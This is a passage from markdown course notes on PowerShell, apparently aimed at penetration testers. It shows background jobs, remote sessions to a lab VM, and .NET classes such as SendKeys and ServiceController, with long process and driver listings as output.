JOHN-PC\n 355 7 2420 5748 34 0.31 608 svchost JOHN-PC\n 271 8 2128 4724 26 0.15 720 svchost JOHN-PC\n 551 14 14492 13176 81 0.32 772 svchost JOHN-PC\n 558 14 22972 30108 104 0.82 856 svchost JOHN-PC\n 1061 28 17912 20664 107 0.83 944 svchost JOHN-PC\n 589 21 6380 11044 58 0.24 1104 svchost JOHN-PC\n 624 27 9440 11600 75 0.32 1220 svchost JOHN-PC\n 318 25 8088 8468 47 0.34 1360 svchost JOHN-PC\n 363 35 147468 42280 210 8.04 1436 svchost JOHN-PC\n 96 7 1060 3676 25 0.04 1916 svchost JOHN-PC\n 423 17 5504 11052 70 0.19 2444 svchost JOHN-PC\n 335 38 7168 8608 62 0.23 2672 svchost JOHN-PC\n 548 0 48 600 2 4 System JOHN-PC\n 153 9 2128 4588 41 0.02 364 taskhost JOHN-PC\n 116 5 1444 3724 45 0.05 668 VBoxService JOHN-PC\n 134 5 1216 4284 61 0.03 2052 VBoxTray JOHN-PC\n 74 5 784 3012 32 0.09 396 wininit JOHN-PC\n 113 4 1532 4260 39 0.24 444 winlogon JOHN-PC\n 118 4 1788 4204 27 0.11 2840 WmiPrvSE JOHN-PC\n 421 15 7296 17944 107 0.40 2344 wmpnetwk JOHN-PC\n 209 10 27684 35648 139 0.72 880 wsmprovhost JOHN-PC\n\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> $sess = New-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {Start-Job -ScriptBlock {ps}} -Session $sess\n\nId Name PSJobTypeName State HasMoreData Location Command PSComputerName\n-- ---- ------------- ----- ----------- -------- ------- --------------\n1 Job1 Running True localhost ps JOHN-PC\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {Get-Job} -Session $sess\n\nId Name PSJobTypeName State HasMoreData Location Command PSComputerName\n-- ---- ------------- ----- ----------- -------- ------- --------------\n1 Job1 Completed True localhost ps JOHN-PC\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {Get-Job | Receive-Job} -Session $sess\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName\n------- ------ ----- ----- ----- ------ -- ----------- --------------\n 31 2 492 1980 17 0.01 2156 conhost JOHN-PC\n 427 5 1080 2492 33 0.13 348 csrss JOHN-PC\n 161 6 1128 3488 32 0.27 404 csrss JOHN-PC\n 66 3 892 2908 38 0.03 1132 dwm JOHN-PC\n 823 26 28592 42576 207 2.92 940 explorer JOHN-PC\n 0 0 0 12 0 0 Idle JOHN-PC\n 791 15 3072 7340 33 0.64 496 lsass JOHN-PC\n 197 5 1600 3572 23 0.05 504 lsm JOHN-PC\n 240 11 24716 34280 147 0.37 4012 powershell JOHN-PC\n 661 15 15920 8708 88 0.31 2224 SearchIndexer JOHN-PC\n 192 7 4236 4748 33 0.63 488 services JOHN-PC\n 29 1 216 576 4 0.05 272 smss JOHN-PC\n 275 9 4312 5688 57 0.06 1324 spoolsv JOHN-PC\n 344 7 2452 5256 34 0.32 608 svchost JOHN-PC\n 257 8 2212 4532 26 0.19 720 svchost JOHN-PC\n 548 14 14412 11644 81 0.36 772 svchost JOHN-PC\n 515 13 25176 30232 103 1.57 856 svchost JOHN-PC\n 1009 25 11884 17924 88 0.94 944 svchost JOHN-PC\n 530 20 6088 9388 55 0.25 1104 svchost JOHN-PC\n 606 21 9660 10564 75 0.34 1220 svchost JOHN-PC\n 308 25 7956 6348 46 0.34 1360 svchost JOHN-PC\n 335 35 144320 23808 206 8.32 1436 svchost JOHN-PC\n 96 7 1060 3276 25 0.04 1916 svchost JOHN-PC\n 400 16 5376 10520 69 0.19 2444 svchost JOHN-PC\n 343 28 7832 8452 64 0.25 2672 svchost JOHN-PC\n 550 0 48 600 2 4 System JOHN-PC\n 147 8 2044 4344 40 0.02 364 taskhost JOHN-PC\n 116 5 1424 3352 44 0.05 668 VBoxService JOHN-PC\n 136 5 1192 3948 59 0.03 2052 VBoxTray JOHN-PC\n 74 5 784 2816 32 0.09 396 wininit JOHN-PC\n 113 4 1496 3596 39 0.24 444 winlogon JOHN-PC\n 112 4 1692 4000 26 0.11 2840 WmiPrvSE JOHN-PC\n 409 15 7232 3556 106 0.40 2344 wmpnetwk JOHN-PC\n 256 11 30032 38152 145 0.36 3140 wsmprovhost JOHN-PC\n\nPS C:\\Users\\Administrator>\n```\n\nUsing ```AsJob```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-Command -ScriptBlock {ps} -ComputerName JOHN-PC -Credential John-PC\\John -AsJob\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n7 Job7 RemoteJob Running True JOHN-PC ps\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job\n\nId Name PSJobTypeName State HasMoreData Location Command\n-- ---- ------------- ----- ----------- -------- -------\n7 Job7 RemoteJob Completed True JOHN-PC ps\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-Job -id 7 | Receive-Job\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName PSComputerName\n------- ------ ----- ----- ----- ------ -- ----------- --------------\n 421 5 1080 2488 33 0.14 348 csrss JOHN-PC\n 161 6 1128 3492 32 0.27 404 csrss JOHN-PC\n 66 3 892 2908 38 0.03 1132 dwm JOHN-PC\n 827 26 28528 42488 206 2.92 940 explorer JOHN-PC\n 0 0 0 12 0 0 Idle JOHN-PC\n 798 15 3080 7416 33 0.65 496 lsass JOHN-PC\n 198 5 1608 3580 23 0.05 504 lsm JOHN-PC\n 655 15 15712 8244 81 0.31 2224 SearchIndexer JOHN-PC\n 194 8 4324 4808 34 0.63 488 services JOHN-PC\n 29 1 216 576 4 0.05 272 smss JOHN-PC\n 275 9 4312 5704 57 0.06 1324 spoolsv JOHN-PC\n 343 7 2420 5228 33 0.32 608 svchost JOHN-PC\n 256 8 2172 4500 26 0.20 720 svchost JOHN-PC\n 551 14 14392 11708 81 0.36 772 svchost JOHN-PC\n 516 13 25204 29328 103 1.78 856 svchost JOHN-PC\n 1010 25 11336 17900 88 0.95 944 svchost JOHN-PC\n 528 20 6060 9376 55 0.25 1104 svchost JOHN-PC\n 612 25 9764 10676 75 0.36 1220 svchost JOHN-PC\n 300 24 8076 6392 46 0.34 1360 svchost JOHN-PC\n 352 35 147444 17736 209 8.34 1436 svchost JOHN-PC\n 96 7 1060 3272 25 0.04 1916 svchost JOHN-PC\n 398 16 5376 10524 69 0.19 2444 svchost JOHN-PC\n 344 18 7840 8540 64 0.27 2672 svchost JOHN-PC\n 546 0 48 600 2 4 System JOHN-PC\n 147 8 2044 4344 40 0.02 364 taskhost JOHN-PC\n 116 5 1444 3348 44 0.06 668 VBoxService JOHN-PC\n 136 5 1192 3940 59 0.03 2052 VBoxTray JOHN-PC\n 74 5 784 2816 32 0.09 396 wininit JOHN-PC\n 113 4 1496 3596 39 0.24 444 winlogon JOHN-PC\n 112 4 1772 4092 26 0.11 2840 WmiPrvSE JOHN-PC\n 409 15 7232 3864 106 0.40 2344 wmpnetwk JOHN-PC\n 290 11 19988 29536 145 0.41 3140 wsmprovhost JOHN-PC\n 209 10 27672 35632 139 0.70 3172 wsmprovhost JOHN-PC\n\nPS C:\\Users\\Administrator>\n```\n\n###### Exercise\n\n- Run jobs in a ```PSSession```\n\n```PowerShell\nPS C:\\Users\\Administrator> Enter-PSSession -ComputerName JOHN-PC -Credential John-PC\\John\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Job\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Start-Job -ScriptBlock {whoami}\n\nId Name State HasMoreData Location Command\n-- ---- ----- ----------- -------- -------\n1 Job1 Running True localhost whoami\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Start-Job -ScriptBlock {ps}\n\nId Name State HasMoreData Location Command\n-- ---- ----- ----------- -------- -------\n3 Job3 Running True localhost ps\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Job\n\nId Name State HasMoreData Location Command\n-- ---- ----- ----------- -------- -------\n1 Job1 Completed False localhost whoami\n3 Job3 Completed True localhost ps\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Job -id 1 | Receive-Job\njohn-pc\\john\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> Get-Job -id 3 | Receive-Job\n\nHandles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName\n------- ------ ----- ----- ----- ------ -- -----------\n 31 2 488 1968 17 0.00 3212 conhost\n 561 6 1164 2652 34 0.24 348 csrss\n 174 6 1128 3496 32 0.28 404 csrss\n 66 3 892 2900 38 0.03 1132 dwm\n 799 24 27856 40772 195 2.95 940 explorer\n 0 0 0 12 0 0 Idle\n 824 15 3184 7756 33 2.79 496 lsass\n 199 5 1624 3616 23 0.11 504 lsm\n 244 11 24744 34284 147 0.35 3692 powershell\n 136 7 10036 13220 60 6.42 2068 rundll32\n 682 17 18292 14416 121 1.20 2224 SearchIndexer\n 214 7 4364 5936 37 0.90 488 services\n 29 1 216 576 4 0.05 272 smss\n 279 9 4356 5748 58 0.06 1324 spoolsv\n 347 7 2540 5456 35 0.41 608 svchost\n 275 8 2164 4560 26 0.20 720 svchost\n 563 14 15432 12408 84 0.40 772 svchost\n 503 12 31660 37072 99 4.56 856 svchost\n 1024 25 12088 18948 91 1.07 944 svchost\n 547 21 6480 10076 56 0.25 1104 svchost\n 618 25 12424 12244 78 1.45 1220 svchost\n 311 25 8172 6796 46 0.34 1360 svchost\n 354 35 147768 42368 208 199.65 1436 svchost\n 98 7 1088 3332 25 0.04 1916 svchost\n 397 16 5376 10564 69 0.24 2444 svchost\n 342 16 7988 8712 65 0.38 2672 svchost\n 68 4 932 3616 25 0.02 4028 svchost\n 583 0 48 1456 3 4 System\n 150 9 2072 4384 40 0.02 364 taskhost\n 121 5 2652 6600 35 0.87 1808 TrustedInstaller\n 116 5 1444 3380 44 0.19 668 VBoxService\n 136 5 1192 3924 59 0.05 2052 VBoxTray\n 119 5 1344 4832 30 0.06 2168 VSSVC\n 74 5 784 2816 32 0.09 396 wininit\n 113 4 1496 3592 39 0.24 444 winlogon\n 173 7 4016 7880 53 0.08 2500 WmiPrvSE\n 411 15 7396 7460 107 0.46 2344 wmpnetwk\n 287 11 19404 25684 144 0.41 3140 wsmprovhost\n 360 12 43684 53604 161 1.05 3936 wsmprovhost\n\n\n[JOHN-PC]: PS C:\\Users\\John\\Documents>\n```\n\n```PowerShell\n[JOHN-PC]: PS C:\\Users\\John\\Documents> exit\nPS C:\\Users\\Administrator>\n```" }, { "path": "27-Using-NET-in-Powershell-Part-1.md", "content": "#### 27. Using .NET in Powershell Part 1\n\n- Loaded ```assemblies``` in ```Powershell``` session\n\n```PowerShell\nPS C:\\> [AppDomain]::CurrentDomain.GetAssemblies()\n\nGAC Version Location\n--- ------- --------\nTrue v2.0.50727 C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Micros...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Man...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Con...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WS...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\M...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e3...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.Directo...\nTrue v2.0.50727 C:\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll\n\nPS C:\\>\n```\n\n- Get the ```type``` of the ```Assembly```\n\n```PowerShell\nPS C:\\> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()}\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\n\nPS C:\\>\n```\n\n- ```Assemblies``` where ```IsPublic``` is ```True```\n\n```PowerShell\nPS C:\\> [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()} | Where-Object {$_.IsPublic -eq \"True\"}\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\nTrue True Assembly System.Object\n\nPS C:\\>\n```\n\n- Use ```.Net``` class to print ```processes``` on the ```Machine```\n\n```PowerShell\nPS C:\\> $Classes = [AppDomain]::CurrentDomain.GetAssemblies() | ForEach-Object {$_.GetType()} | Where-Object {$_.IsPublic -eq \"True\"}\n```\n\n```PowerShell\nPS C:\\> $Classes | Where-Object {$_.Name -eq \"Process\"}\n```\n\n```PowerShell\nPS C:\\> $ProcClass = $Classes | Where-Object { $_.Name -eq \"Process\" }\n```\n\nList ```methods``` / ```properties``` of an object\n\n```PowerShell\nPS C:\\> $ProcClass | Get-Member\n```\n\n```PowerShell\nPS C:\\> $ProcClass | Get-Member -MemberType Method\n```\n\n```PowerShell\nPS C:\\> $ProcClass | Get-Member -MemberType Method -Static\n```\n\n```PowerShell\nPS C:\\> $ProcClass::GetCurrentProcess()\n```\n\n```PowerShell\nPS C:\\> $ProcClass.FullName\nSystem.Diagnostics.Process\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> [System.Diagnostics.Process]::GetCurrentProcess()\n```\n\n```PowerShell\nPS C:\\> [System.Diagnostics.Process]::GetProcesses()\n```\n\n```PowerShell\nPS C:\\> $ProcClass | Get-Member | Format-List *\n```" }, { "path": "28-Using-NET-in-Powershell-Part-2.md", "content": "#### 28. Using .NET in Powershell Part 2\n\n###### System.Windows.Forms\n\n- ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.Windows.Forms```\n\n```PowerShell\nPS C:\\> Add-Type -AssemblyName System.Windows.Forms\n```\n\n- Check if ```System.Windows.Forms``` is loaded\n\n```PowerShell\nPS C:\\> [System.Windows.Forms.SendKeys]\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue False SendKeys System.Object\n\nPS C:\\>\n```\n\n- List ```Static``` members of ```System.Windows.Forms```\n\n```PowerShell\nPS C:\\> [System.Windows.Forms.SendKeys] | Get-Member -Static\n\n TypeName: System.Windows.Forms.SendKeys\n\nName MemberType Definition\n---- ---------- ----------\nEquals Method static bool Equals(System.Object objA, System.Object objB)\nFlush Method static System.Void Flush()\nReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB)\nSend Method static System.Void Send(string keys)\nSendWait Method static System.Void SendWait(string keys)\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> [System.Windows.Forms.SendKeys] | Get-Member -Static | Format-List *\n\nTypeName : System.Windows.Forms.SendKeys\nName : Equals\nMemberType : Method\nDefinition : static bool Equals(System.Object objA, System.Object objB)\n\nTypeName : System.Windows.Forms.SendKeys\nName : Flush\nMemberType : Method\nDefinition : static System.Void Flush()\n\nTypeName : System.Windows.Forms.SendKeys\nName : ReferenceEquals\nMemberType : Method\nDefinition : static bool ReferenceEquals(System.Object objA, System.Object objB)\n\nTypeName : System.Windows.Forms.SendKeys\nName : Send\nMemberType : Method\nDefinition : static System.Void Send(string keys)\n\nTypeName : System.Windows.Forms.SendKeys\nName : SendWait\nMemberType : Method\nDefinition : static System.Void SendWait(string keys)\n\nPS C:\\>\n```\n\n- Use ```SendWait``` ```Static``` member\n\n```PowerShell\nPS C:\\> [System.Windows.Forms.SendKeys]::SendWait\n\nMemberType : Method\nOverloadDefinitions : {static System.Void SendWait(string keys)}\nTypeNameOfValue : System.Management.Automation.PSMethod\nValue : static System.Void SendWait(string keys)\nName : SendWait\nIsInstance : True\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> [System.Windows.Forms.SendKeys]::SendWait(\"Powershell for Pentesters\")\nPS C:\\> Powershell for Pentesters\nPS C:\\> \n```\n\n###### System.ServiceProcess\n\n- ```Add-Type``` Cmdlet with ```AssemblyName``` ```System.ServiceProcess```\n\n```PowerShell\nPS C:\\> Add-Type -AssemblyName System.ServiceProcess\n```\n\n- Check if ```System.ServiceProcess.ServiceController``` is loaded\n\n```PowerShell\nPS C:\\> [System.ServiceProcess.ServiceController]\n\nIsPublic IsSerial Name BaseType\n-------- -------- ---- --------\nTrue False ServiceController System.ComponentModel.Component\n\nPS C:\\>\n```\n\n- List ```Static``` members of ```System.ServiceProcess.ServiceController```\n\n```PowerShell\nPS C:\\> [System.ServiceProcess.ServiceController] | Get-Member -Static\n\n TypeName: System.ServiceProcess.ServiceController\n\nName MemberType Definition\n---- ---------- ----------\nEquals Method static bool Equals(System.Object objA, System.Object objB)\nGetDevices Method static System.ServiceProcess.ServiceController[] GetDevices(), static System.ServiceProcess.ServiceController[] GetDevices(string machineName)\nGetServices Method static System.ServiceProcess.ServiceController[] GetServices(), static System.ServiceProcess.ServiceController[] GetServices(string machineName)\nReferenceEquals Method static bool ReferenceEquals(System.Object objA, System.Object objB)\n\nPS C:\\>\n```\n\n```PowerShell\nPS C:\\> [System.ServiceProcess.ServiceController] | Get-Member -Static | Format-List *\n\nTypeName : System.ServiceProcess.ServiceController\nName : Equals\nMemberType : Method\nDefinition : static bool Equals(System.Object objA, System.Object objB)\n\nTypeName : System.ServiceProcess.ServiceController\nName : GetDevices\nMemberType : Method\nDefinition : static System.ServiceProcess.ServiceController[] GetDevices(), static System.ServiceProcess.ServiceController[] GetDevices(string machineName)\n\nTypeName : System.ServiceProcess.ServiceController\nName : GetServices\nMemberType : Method\nDefinition : static System.ServiceProcess.ServiceController[] GetServices(), static System.ServiceProcess.ServiceController[] GetServices(string machineName)\n\nTypeName : System.ServiceProcess.ServiceController\nName : ReferenceEquals\nMemberType : Method\nDefinition : static bool ReferenceEquals(System.Object objA, System.Object objB)\n\nPS C:\\>\n```\n\n- Use ```GetDevices``` ```Static``` member\n\n```PowerShell\nPS C:\\> [System.ServiceProcess.ServiceController]::GetDevices()\n\nStatus Name DisplayName\n------ ---- -----------\nStopped 1394ohci 1394 OHCI Compliant Host Controller\nRunning ACPI Microsoft ACPI Driver\nStopped AcpiPmi ACPI Power Meter Driver\nStopped adp94xx adp94xx\nStopped adpahci adpahci\nStopped adpu320 adpu320\nRunning AFD Ancillary Function Driver for Winsock\nStopped agp440 Intel AGP Bus Filter\nStopped aic78xx aic78xx\nStopped aliide aliide\nStopped amdagp AMD AGP Bus Filter Driver\nStopped amdide amdide\nStopped AmdK8 AMD K8 Processor Driver\nStopped AmdPPM AMD Processor Driver\nStopped amdsata amdsata\nStopped amdsbs amdsbs\nRunning amdxata amdxata\nStopped AppID AppID Driver\nStopped arc arc\nStopped arcsas arcsas\nStopped AsyncMac RAS Asynchronous Media Driver\nRunning atapi IDE Channel\nStopped b06bdrv Broadcom NetXtreme II VBD\nStopped b57nd60x Broadcom NetXtreme Gigabit Ethernet...\nRunning Beep Beep\nRunning blbdrive blbdrive\nRunning bowser Browser Support Driver\nStopped BrFiltLo Brother USB Mass-Storage Lower Filt...\nStopped BrFiltUp Brother USB Mass-Storage Upper Filt...\nStopped Brserid Brother MFC Serial Port Interface D...\nStopped BrSerWdm Brother WDM Serial driver\nStopped BrUsbMdm Brother MFC USB Fax Only Modem\nStopped BrUsbSer Brother MFC USB Serial WDM Driver\nStopped BTHMODEM Bluetooth Serial Communications Driver\nStopped cdfs CD/DVD File System Reader\nRunning cdrom CD-ROM Driver\nStopped circlass Consumer IR Devices\nRunning CLFS Common Log (CLFS)\nStopped CmBatt Microsoft ACPI Control Method Batte...\nStopped cmdide cmdide\nRunning CNG CNG\nRunning Compbatt Microsoft Composite Battery Driver\nStopped CompositeBus Composite Bus Enumerator Driver\nStopped crcdisk Crcdisk Filter Driver\nRunning CSC Offline Files Driver\nRunning DfsC DFS Namespace Client Driver\nRunning discache System Attribute Cache\nRunning Disk Disk Driver\nStopped drmkaud Microsoft Trusted Audio Drivers\nStopped DXGKrnl LDDM Graphics Subsystem\nStopped E1G60 Intel(R) PRO/1000 NDIS 6 Adapter Dr...\nStopped ebdrv Broadcom NetXtreme II 10 GigE VBD\nStopped elxstor elxstor\nStopped ErrDev Microsoft Hardware Error Device Driver\nStopped exfat exFAT File System Driver\nStopped fastfat FAT12/16/32 File System Driver\nStopped fdc Floppy Disk Controller Driver\nRunning FileInfo File Information FS MiniFilter\nStopped Filetrace Filetrace\nStopped flpydisk Floppy Disk Driver\nRunning FltMgr FltMgr\nStopped FsDepends File System Dependency Minifilter\nRunning fvevol Bitlocker Drive Encryption Filter D...\nStopped gagp30kx Microsoft Generic AGPv3.0 Filter fo...\nStopped hcw85cir Hauppauge Consumer Infrared Receiver\nStopped HdAudAddService Microsoft 1.1 UAA Function Driver f...\nStopped HDAudBus Microsoft UAA Bus Driver for High D...\nStopped HidBatt HID UPS Battery Driver\nStopped HidBth Microsoft Bluetooth HID Miniport\nStopped HidIr Microsoft Infrared HID Driver\nStopped HidUsb Microsoft HID Class Driver\nStopped HpSAMD HpSAMD\nRunning HTTP HTTP\nRunning hwpolicy Hardware Policy Driver\nStopped i8042prt i8042 Keyboard and PS/2 Mouse Port ...\nStopped iaStorV iaStorV\nStopped iirsp iirsp\nStopped intelide intelide\nStopped intelppm Intel Processor Driver\nStopped IpFilterDriver IP Traffic Filter Driver\nStopped IPMIDRV IPMIDRV\nStopped IPNAT IP Network Address Translator\nStopped IRENUM IR Bus Enumerator\nStopped isapnp isapnp\nStopped iScsiPrt iScsiPort Driver\nStopped kbdclass Keyboard Class Driver\nStopped kbdhid Keyboard HID Driver\nRunning KSecDD KSecDD\nRunning KSecPkg KSecPkg\nRunning lltdio Link-Layer Topology Discovery Mappe...\nStopped LSI_FC LSI_FC\nStopped LSI_SAS LSI_SAS\nStopped LSI_SAS2 LSI_SAS2\nStopped LSI_SCSI LSI_SCSI\nRunning luafv UAC File Virtualization\nStopped megasas megasas\nStopped MegaSR MegaSR\nStopped Modem Modem\nStopped monitor Microsoft Monitor Class Function Dr...\nStopped mouclass Mouse Class Driver\nStopped mouhid Mouse HID Driver\nRunning mountmgr Mount Point Manager\nStopped mpio mpio\nRunning mpsdrv Windows Firewall Authorization Driver\nStopped MRxDAV WebDav Client Redirector Driver\nRunning mrxsmb SMB MiniRedirector Wrapper and Engine\nRunning mrxsmb10 SMB 1.x MiniRedirector\nRunning mrxsmb20 SMB 2.0 MiniRedirector\nRunning msahci msahci\nStopped msdsm msdsm\nRunning Msfs Msfs\nStopped mshidkmdf Pass-through HID to KMDF Filter Driver\nRunning msisadrv msisadrv\nStopped MSKSSRV Microsoft Streaming Service Proxy\nStopped MSPCLOCK Microsoft Streaming Clock Proxy\nStopped MSPQM Microsoft Streaming Quality Manager...\nStopped MsRPC MsRPC\nRunning mssmbios Microsoft System Management BIOS Dr...\nStopped MSTEE Microsoft Streaming Tee/Sink-to-Sin...\nStopped MTConfig Microsoft Input Configuration Driver\nRunning Mup Mup\nStopped NativeWifiP NativeWiFi Filter\nRunning NDIS NDIS System Driver\nStopped NdisCap NDIS Capture LightWeight Filter\nStopped NdisTapi Remote Access NDIS TAPI Driver\nStopped Ndisuio NDIS Usermode I/O Protocol\nStopped NdisWan Remote Access NDIS WAN Driver\nStopped NDProxy NDIS Proxy\nRunning NetBIOS NetBIOS Interface\nRunning NetBT NetBT\nStopped nfrd960 nfrd960\nRunning Npfs Npfs\nRunning nsiproxy NSI proxy service driver.\nStopped Ntfs Ntfs\nRunning Null Null\nStopped nvraid nvraid\nStopped nvstor nvstor\nStopped nv_agp NVIDIA nForce AGP Bus Filter\nStopped ohci1394 1394 OHCI Compliant Host Controller...\nStopped Parport Parallel port driver\nRunning partmgr Partition Manager\nStopped Parvdm Parvdm\nRunning pci PCI Bus Driver\nStopped pciide pciide\nStopped pcmcia pcmcia\nRunning pcw Performance Counters for Windows Dr...\nRunning PEAUTH PEAUTH\nStopped PptpMiniport WAN Miniport (PPTP)\nStopped Processor Processor Driver\nRunning Psched QoS Packet Scheduler\nStopped ql2300 ql2300\nStopped ql40xx ql40xx\nStopped QWAVEdrv QWAVE driver\nStopped RasAcd Remote Access Auto Connection Driver\nStopped RasAgileVpn WAN Miniport (IKEv2)\nStopped Rasl2tp WAN Miniport (L2TP)\nStopped RasPppoe Remote Access PPPOE Driver\nStopped RasSstp WAN Miniport (SSTP)\nRunning rdbss Redirected Buffering Sub Sysytem\nStopped rdpbus Remote Desktop Device Redirector Bu...\nRunning RDPCDD RDPCDD\nRunning RDPDR Terminal Server Device Redirector D...\nRunning RDPENCDD RDP Encoder Mirror Driver\nRunning RDPREFMP Reflector Display Driver used to ga...\nStopped RDPWD RDP Winstation Driver\nRunning rdyboost ReadyBoost\nRunning rspndr Link-Layer Topology Discovery Respo...\nStopped s3cap s3cap\nStopped sbp2port sbp2port\nStopped scfilter Smart card PnP Class Filter Driver\nRunning secdrv Security Driver\nStopped Serenum Serenum Filter Driver\nStopped Serial Serial Port Driver\nStopped sermouse Serial Mouse Driver\nStopped sffdisk SFF Storage Class Driver\nStopped sffp_mmc SFF Storage Protocol Driver for MMC\nStopped sffp_sd SFF Storage Protocol Driver for SDBus\nStopped sfloppy High-Capacity Floppy Disk Drive\nStopped sisagp SIS AGP Bus Filter\nStopped SiSRaid2 SiSRaid2\nStopped SiSRaid4 SiSRaid4\nStopped Smb Message-oriented TCP/IP and TCP/IPv...\nRunning spldr Security Processor Loader Driver\nRunning srv Server SMB 1.xxx Driver\nRunning srv2 Server SMB 2.xxx Driver\nRunning srvnet srvnet\nStopped stexstor stexstor\nRunning storflt Disk Virtual Machine Bus Accelerati...\nStopped storvsc storvsc\nStopped swenum Software Bus Driver\nRunning Tcpip TCP/IP Protocol Driver\nStopped TCPIP6 Microsoft IPv6 Protocol Driver\nRunning tcpipreg TCP/IP Registry Compatibility\nStopped TDPIPE TDPIPE\nStopped TDTCP TDTCP\nRunning tdx NetIO Legacy TDI Support Driver\nRunning TermDD Terminal Device Driver\nStopped tssecsrv Remote Desktop Services Security Fi...\nStopped tunnel Microsoft Tunnel Miniport Adapter D...\nStopped uagp35 Microsoft AGPv3.5 Filter\nStopped udfs udfs\nStopped uliagpkx Uli AGP Bus Filter\nStopped umbus UMBus Enumerator Driver\nStopped UmPass Microsoft UMPass Driver\nStopped usbccgp Microsoft USB Generic Parent Driver\nStopped usbcir eHome Infrared Receiver (USBCIR)\nStopped usbehci Microsoft USB 2.0 Enhanced Host Con...\nStopped usbhub Microsoft USB Standard Hub Driver\nStopped usbohci Microsoft USB Open Host Controller ...\nStopped usbprint Microsoft USB PRINTER Class\nStopped USBSTOR USB Mass Storage Driver\nStopped usbuhci Microsoft USB Universal Host Contro...\nRunning VBoxGuest VirtualBox Guest Driver\nStopped 